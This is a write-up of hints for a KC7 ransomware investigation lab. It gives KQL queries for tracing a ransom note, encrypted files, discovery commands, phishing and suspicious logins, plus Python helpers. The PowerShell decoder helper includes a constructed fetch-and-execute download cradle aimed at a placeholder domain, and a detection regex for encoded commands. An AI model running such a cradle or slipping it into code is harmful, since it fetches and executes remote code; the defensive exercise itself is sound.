This post is a write-up with clues for solving the KC7 investigation case Inside Encryptodera, Section 2: Crypto Conquest. Use it as a guide when you hit an obstacle; it is structured as a fill-in-the-blanks solution, so the queries show you where to look rather than spelling out every answer.

Section 2:

Question 1: What is the filename of this note?

Do you see it? It is the .txt file in the results of the query below.

FileCreationEvents
| where path contains "GIMME"
| distinct filename

Question 2: What kind of attack is this?

Data Encrypted for Impact (MITRE ATT&CK T1486).

Question 3: On how many machines was this .txt file seen?

FileCreationEvents
| where path has "YOU_GOT_CRYTOED_SO_GIMME_CRYPTO.txt"
| distinct hostname
| count

Question 4: What time was the ransom note first seen?

FileCreationEvents
| where path has "YOU_GOT_CRYTOED_SO_GIMME_CRYPTO.txt"
| top 1 by timestamp asc
| project timestamp

Question 5: What is the hostname of the system where the ransom note was first seen?

FileCreationEvents
| where path has "YOU_GOT_CRYTOED_SO_GIMME_CRYPTO.txt"
| top 1 by timestamp asc
| project timestamp, hostname

Question 6: How many files were encrypted on this machine?

The question gives us the hostname UL8R-MACHINE and the date 2024-02-17. The following KQL lists the file activity on that host from that date onward:

FileCreationEvents
| where hostname == "UL8R-MACHINE"
| where timestamp >= datetime(2024-02-17)

Adding | distinct filename to the KQL above shows that only two files, files_go_byebye.exe and YOU_GOT_CRYTOED_SO_GIMME_CRYPTO.txt, do not end in .umadbro. Every other file created on the host in this window is an encrypted file, so the number of encrypted files is the number of .umadbro entries.

That is enough to answer the question, but let me stretch my brain a little. The filename column showed three extension types: .txt, .exe and .umadbro. If there were many more, scrolling would not be practical, so here is an efficient way to list every extension with its count:

FileCreationEvents
| where hostname == "UL8R-MACHINE"
| where timestamp >= datetime(2024-02-17)
| extend FileExtension = tostring(split(filename, ".")[-1])
| project  FileExtension
| summarize Count = count() by FileExtension
| sort by Count desc
  • extend FileExtension = tostring(split(filename, ".")[-1]):
    • In this line, we are using the extend operator to create a new column called FileExtension.
    • We are using the split function to split the filename by the dot (".") character. This will create an array of substrings where the dot is the delimiter.
    • The [-1] index extracts the last element of the array, which is the file extension. Two caveats: a filename with no dot returns the whole name, and a double extension such as .xlsx.exe (which we meet again in Question 19) returns only the last part, exe.
    • We are converting the extracted file extension to a string using tostring function and storing it in the FileExtension column.
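The same summarize-by-extension logic, run over a handful of constructed FileCreationEvents rows so you can see the edge cases from the bullets above. This is an added example, not KC7's data or the original post's code: the hostnames, paths and timestamps are invented, and only the ransom-note name, the dropper name and the .umadbro extension come from the write-up. It also covers the first-seen and host-count questions (Questions 3 to 5) on the same rows.

```python
import csv
import io
from collections import Counter
from datetime import datetime, timezone

# Constructed sample in the shape of the KC7 FileCreationEvents table.
# Hostnames, paths and times are invented for this illustration.
SAMPLE_FILE_EVENTS = r"""timestamp,hostname,path,filename
2024-02-17T02:31:05Z,UL8R-MACHINE,C:\Temp\files_go_byebye.exe,files_go_byebye.exe
2024-02-17T02:31:40Z,UL8R-MACHINE,C:\Users\u\Documents\budget.xlsx.umadbro,budget.xlsx.umadbro
2024-02-17T02:31:41Z,UL8R-MACHINE,C:\Users\u\Documents\notes.txt.umadbro,notes.txt.umadbro
2024-02-17T02:31:42Z,UL8R-MACHINE,C:\Users\u\Pictures\dog.png.umadbro,dog.png.umadbro
2024-02-17T02:31:43Z,UL8R-MACHINE,C:\Users\u\LICENSE,LICENSE
2024-02-17T02:32:00Z,UL8R-MACHINE,C:\Users\u\Desktop\YOU_GOT_CRYTOED_SO_GIMME_CRYPTO.txt,YOU_GOT_CRYTOED_SO_GIMME_CRYPTO.txt
2024-02-17T02:45:00Z,Q2FX-LAPTOP,C:\Users\v\Desktop\YOU_GOT_CRYTOED_SO_GIMME_CRYPTO.txt,YOU_GOT_CRYTOED_SO_GIMME_CRYPTO.txt
"""

NOTE = "YOU_GOT_CRYTOED_SO_GIMME_CRYPTO.txt"


def parse_timestamp(value: str) -> datetime:
    # KC7 timestamps are ISO 8601 with a trailing Z; make them explicitly UTC
    # so comparisons never mix naive and aware datetimes.
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def load_events(text: str) -> list:
    rows = list(csv.DictReader(io.StringIO(text)))
    for row in rows:
        row["timestamp"] = parse_timestamp(row["timestamp"])
    return rows


def extension_of(filename: str) -> str:
    """Same rule as KQL's tostring(split(filename, ".")[-1]): text after the last dot.
    A name with no dot returns the whole name; report.xlsx.exe returns only "exe"."""
    return filename.rsplit(".", 1)[-1]


def extension_counts(events, hostname: str, since: datetime) -> Counter:
    """Question 6 query: filter by host and time, then summarize count() by extension."""
    return Counter(
        extension_of(e["filename"])
        for e in events
        if e["hostname"] == hostname and e["timestamp"] >= since
    )


def ransomware_extension(counts: Counter) -> str:
    # Question 7: the most frequent extension is the one appended to every victim file.
    return counts.most_common(1)[0][0]


def encrypted_file_count(events, hostname: str, ext: str) -> int:
    return sum(1 for e in events if e["hostname"] == hostname and extension_of(e["filename"]) == ext)


def first_seen(events, filename: str):
    """Questions 4 and 5: timestamp and host of the earliest creation of a file."""
    hits = [e for e in events if e["filename"] == filename]
    if not hits:
        return None
    earliest = min(hits, key=lambda e: e["timestamp"])
    return earliest["timestamp"], earliest["hostname"]


def host_count(events, filename: str) -> int:
    """Question 3: number of distinct hosts on which the file appeared."""
    return len({e["hostname"] for e in events if e["filename"] == filename})


EVENTS = load_events(SAMPLE_FILE_EVENTS)
COUNTS = extension_counts(EVENTS, "UL8R-MACHINE", parse_timestamp("2024-02-17T00:00:00Z"))

if __name__ == "__main__":
    for ext, n in COUNTS.most_common():
        print(f"{ext:10} {n}")
    ext = ransomware_extension(COUNTS)
    print("ransomware extension:", ext)
    print("encrypted files on UL8R-MACHINE:", encrypted_file_count(EVENTS, "UL8R-MACHINE", ext))
    print("note first seen:", first_seen(EVENTS, NOTE))
    print("hosts with note:", host_count(EVENTS, NOTE))
```

Note how the dotless LICENSE row shows up as its own "extension", exactly as the KQL split would report it; in a real dataset, filter such rows out (or require a dot) before trusting the histogram.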

Question 7: What is the extension that was used on the encrypted files?

The answer is the extension with the highest Count in the Question 6 result.

Question 8: What command was run that references the ransomware extension?

The question provides the KQL; the answer is the value in the process_commandline column.

Question 9: When did files_go_byebye.exe appear on this machine?

FileCreationEvents
| where hostname == "UL8R-MACHINE"
| where filename contains "byebye"
| project timestamp

Question 10: How many commands were run on UL8R-MACHINE during this timeframe?

The question provides the KQL. Read the record count from the results, or append | count to the query.

Question 11: What domain does the encoded PowerShell reference?

ProcessEvents
| where hostname == "UL8R-MACHINE"
| where timestamp between (datetime("2024-02-16") .. datetime("2024-02-18"))
| distinct process_commandline

The question hints at PowerShell. I added the following line to reduce the number of rows to review:

| where process_commandline contains "powershell"

Copy the base64 string and decode it with your favorite tool or script, or with an online Base64 decoder. Keep in mind that PowerShell's -EncodedCommand argument is base64 over the UTF-16LE bytes of the script, so a decoder that assumes UTF-8 will show a NUL byte after every character; decode as UTF-16LE (or strip the NULs) to read the domain.
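A small decoder for this step, written for this write-up rather than taken from KC7 or the original post. It pulls the encoded argument out of a process command line (accepting the -e, -ec, -enc and -EncodedCommand spellings), decodes it as UTF-16LE, and lists the hosts of any URLs in the script. The sample command line and the domain cdn-updates.example.net are constructed placeholders, not values from the dataset.

```python
import base64
import re


def encode_powershell(script: str) -> str:
    """Produce a -EncodedCommand value the way attacker tooling does:
    UTF-16LE bytes of the script, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# powershell.exe accepts -e, -ec, -enc and -EncodedCommand. Longest alternative
# first so "-enc" is not cut short by the "-e" branch; "-Exec Bypass" does not
# match because a whitespace-separated argument must follow the flag.
ENCODED_FLAG = re.compile(
    r"(?i)(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)"
)
URL_HOST = re.compile(r"(?i)https?://([A-Za-z0-9.-]+)")


def extract_encoded_blob(commandline: str):
    """Return the base64 argument, or None if the command line is not encoded."""
    m = ENCODED_FLAG.search(commandline)
    return m.group(1) if m else None


def _b64decode_lenient(blob: str) -> bytes:
    # Tolerate padding stripped by log pipelines or copy/paste.
    return base64.b64decode(blob + "=" * (-len(blob) % 4))


def decode_encoded_command(commandline: str):
    """Recover the script text. The bytes are UTF-16LE, not UTF-8."""
    blob = extract_encoded_blob(commandline)
    if blob is None:
        return None
    return _b64decode_lenient(blob).decode("utf-16-le")


def decode_as_utf8(commandline: str):
    """What a generic base64 decoder shows: every ASCII character followed by a NUL."""
    blob = extract_encoded_blob(commandline)
    if blob is None:
        return None
    return _b64decode_lenient(blob).decode("utf-8", "replace")


def referenced_domains(commandline: str) -> list:
    """Hosts of any http(s) URLs in the decoded script, in order of first appearance."""
    script = decode_encoded_command(commandline)
    if script is None:
        return []
    hosts = []
    for host in URL_HOST.findall(script):
        host = host.lower()
        if host not in hosts:
            hosts.append(host)
    return hosts


# Constructed sample: a download cradle pointing at a placeholder domain,
# wrapped in a command line shaped like the ones in ProcessEvents.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://cdn-updates.example.net/stage.ps1')"
SAMPLE_COMMANDLINE = "powershell.exe -NoP -W Hidden -Exec Bypass -Enc " + encode_powershell(SAMPLE_SCRIPT)

if __name__ == "__main__":
    print(decode_encoded_command(SAMPLE_COMMANDLINE))
    print(repr(decode_as_utf8(SAMPLE_COMMANDLINE))[:40], "...")
    print(referenced_domains(SAMPLE_COMMANDLINE))
```

Running it prints the readable cradle first and then the NUL-riddled UTF-8 misreading, which is what you get from a decoder that does not know about PowerShell's encoding.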

Question 12: What command is run right before the base64-encoded PowerShell?

The KQL from Question 11, before the powershell filter, lists the commands in order and reveals the answer. Alternatively, take the timestamp of the encoded PowerShell command and ask for the last command that ran before it:

ProcessEvents
| where hostname == "UL8R-MACHINE"
| where timestamp < datetime(2024-02-17T02:29:53Z)
| project timestamp , process_commandline
| top 1 by timestamp desc 

Question 13: How many devices ran the gpupdate /force command?

ProcessEvents
| where process_commandline has "gpupdate /force"
| distinct hostname
| count

Question 14: How many machines at Encryptodera ran “systeminfo”?

ProcessEvents
| where process_commandline has "systeminfo"
| distinct hostname
| count

Question 15: What was the timestamp for the first time the command was run?

ProcessEvents
| where process_commandline has "systeminfo"
| top 1 by timestamp asc

Question 16: How many days elapsed between when the attackers ran discovery commands and when the ransomware attack started?

Subtract the timestamp from Question 15 (the first discovery command) from the timestamp in Question 4 (the first ransom note) and express the difference in whole days.

Question 17: What is the hostname of the device on which the attackers first ran systeminfo?

ProcessEvents
| where process_commandline contains "systeminfo"
| project timestamp , hostname
| top 1 by timestamp asc

Question 18: What was the full commandline used by the threat actor when running nltest /dclist? (paste the full commandline)

ProcessEvents
| where process_commandline contains "nltest /dclist"

Question 19: What is the full name of the .xlsx.exe file on 41QI-LAPTOP?

FileCreationEvents
| where hostname == "41QI-LAPTOP"
| where path contains ".xlsx.exe"
| project filename

Question 20: What file shows up a few seconds after the .xlsx.exe file?

FileCreationEvents
| where hostname == "41QI-LAPTOP"
| where timestamp > datetime(2024-02-01T08:50:12Z)
| top 1 by timestamp asc
| project timestamp , hostname, filename

Question 21: How many devices does screenconnect_client.exe appear on?

FileCreationEvents
| where filename contains "screenconnect_client.exe"
| distinct hostname
| count

Question 22:

Email
| where link contains "xlsx.exe"
| distinct sender

Question 23: How many unusual emails were sent by Barry?

Email
| where sender == "barry_shmelly@encryptoderafinancial.com"
| where timestamp > (datetime("2024-02-01"))
| distinct subject
| count 

Question 24: Type got it once you’ve made a note of these recipients.

got it

Question 25: What IP was used to sign into Barry’s account on February 1st?

The AuthenticationEvents table lets us filter by username. To find Barry's username, look him up in the Employees table:

Employees
| where name contains "Barry"
| project name, username

AuthenticationEvents
| where username == "bashmelly"
| where timestamp between (datetime('2024-02-01T00:00:00Z') .. datetime('2024-02-01T23:59:59Z'))
| order by timestamp desc

Question 26: How many other accounts did that IP log into?

AuthenticationEvents
| where src_ip == "143.38.175.105"
| where username != "bashmelly"
| distinct username
| count

Question 27: How many IPs logged in to all 8 devices where the attacker ran systeminfo?

let hosts = ProcessEvents
| where process_commandline has "systeminfo"
| distinct hostname;
AuthenticationEvents
| where hostname in (hosts)
| summarize dcount(hostname) by src_ip
| order by dcount_hostname desc

The IPs whose dcount_hostname equals 8 logged into every one of those devices; the number of such rows is the answer.

Question 28: What is the role of the employee who this IP address belongs to?

Employees
| where ip_addr == "10.10.0.138"
| project role

Question 29: How many successful logins were made from this IP?

AuthenticationEvents
| where src_ip == "10.10.0.138"
| where result == "Successful Login"
| count 

Question 30: What is the hostname of the server the attackers logged into?

AuthenticationEvents
| where src_ip == "10.10.0.138"
| where result == "Successful Login"
| where hostname contains "server" and hostname !contains "mail"

Community Help

Join the KC7 Discord (#encryptodera channel) to discuss the module.